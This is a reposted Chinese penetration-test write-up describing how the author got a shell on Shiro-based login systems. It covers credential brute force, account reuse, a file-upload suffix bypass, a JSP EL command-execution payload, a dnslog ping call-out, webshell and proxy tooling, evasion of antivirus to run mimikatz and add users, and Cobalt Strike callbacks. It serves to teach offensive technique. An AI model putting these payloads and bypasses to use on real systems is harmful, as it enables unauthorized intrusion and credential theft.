Bypass文件上传绕过-Getshell

前言 某次小型红蓝，直接丢过来几个登陆框，定点打。 环境介绍 全部都是shiro框架。 都是Windows 2012系统 只有登陆框。 过程 爆破 用户名密码，都是加密的。查看网页源代码的时候，发现其中一个利用的DES-ECB的单层加密。可以看到key。（可以爆）利用burp-Crypto插件，把key写进去，点击add即可 然后，爆破选择这个加密即可。经过大量字典，发现目标用户名规则为名字全称zhangsan/lisi果断生成大量的字段。爆破出几个用户名，打算访问的时候，提示没有应用权限。我的超大字典，都没有爆破出一个有效的账号。 一上午毫无收获，陷入沉思。 只有登陆框/shiro框架/js读取/ 目标不能扫描/不能打旁站等。 打工人还是先干饭。 干饭的时候，突然想起来。 竟然都是同一家，会不会账号也是通用的? 用上午在A系统登陆显示没有应用权限的账号，去B系统/C系统/D系统登陆尝试。果然。在B系统和C系统有账号可以登陆。 文件上传 zhangsan账号登陆。直接寻找文件上传的地方。 1 压缩包上传/可以上传，也有路径回显。但是不会自动解压，没有找到可以利用的点。 2. 文件导入功能。 进行尝试 返回包，包含网站绝对路径。 1.jpg 访问4041.txt 访问4041.jsp(绕过在后面) 访问404等等 返回包都包含网站路径了，就是访问不到。接下来尝试文件路径寻找。无果。 又没有思路了。 喝杯水，突然想起来是不是用户问题。 换一个账号wangwu进行登陆。 模块一样。 直接进行文件导入。 1.jpg 4042.txt 404 突然感觉这个点要结束，无法上传。 想着试试jsp吧。 后缀绕过 filename="1.js p" js后面加一个空格即可内容为:123 发现这个jsp竟然可以访问到。 小记 1.访问404是账号权限问题2.目标文件上传只有jsp能解析等才可以访问到。 尝试上传马。 发现目标对文件内容检查 内容检测 检测内容为:<不能直接跟内容 被拦截< jsp:scriptlet> <加空格 可以上传成功，但是这貌似不符合语法，无法解析。 内容检测-绕过1 利用常用的脏字符(不多说) 内容检测-绕过2 发现有表哥谈论过jsp利用EL表达式绕过。 本地尝试 EL表达式内容为 ${Runtime.getRuntime().exec(param.cmd)} jsp的EL表达式是一种没有回显的，这里先借助dnslog测试。刚开始访问时500.一直以为是语法问题，百度也没有找到解决办法。但是后来发现可以调用。 dnslog测试,成功收到 用法 http://localhost:8080/web_test/helloworld.jsp?cmd=ping 08zocw.dnslog.cn 目标是Windows系统。是否可以powershell直接上线呢本地 测试，成功上线 管理工具连接问题 cs本地可以上线，但是想到我们双方都是内网，无法直接cs上线，利用脏字符上传马，之后无法连接。 解决办法 1.冰蝎3.3和哥斯拉都无法连接，这里采用冰蝎2。2.连接时，需要带cookie才可以访问。但是目标cookie变化有点快。有时候存在突然中断，只能手动换cookie 流量代理 1.因为这里双方都是内网的情况下，这里代理采用http协议reGeorg进行代理。 这里需要带cookie去访问 但是不知道为啥，过一会就直接中断，可能和cookie有关，未解决。 2.最终想起来冰蝎3自带的代理挺好用，但是冰蝎3.3无法连接马。 想:是不是新版本就可以了。下载了最新的版本，发现可以连接。利用冰蝎3自带的http协议代理成功。 简单的内网渗透 发现目标存在火绒。利用免杀minikatz读取目标hash。hash为空，无法登陆。 绕过火绒添加用户。成功登陆。 如何上线 关闭目标火绒，cs上线也是曲折的，可能有别的软件。 1.利用免杀分离免杀上线。2.powershell免杀上线。 在目标机器部署了cs。然后本地成功上线。（需要免杀） 总结 1.不同系统相同用户的用法。2.不同用户对文件上传文件访问权限的不同。3.文件上传后缀和内容的绕过4.http隧道用法5.绕过火绒的免杀（mimikazt/添加用户/上线免杀） ———————— 作者：G0mini，转载于FreeBuf.COM 黑白之道发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用，任何人不得将其用于非法用途及盈利等目的，否则后果自行承担！ 如侵权请私聊我们删文 END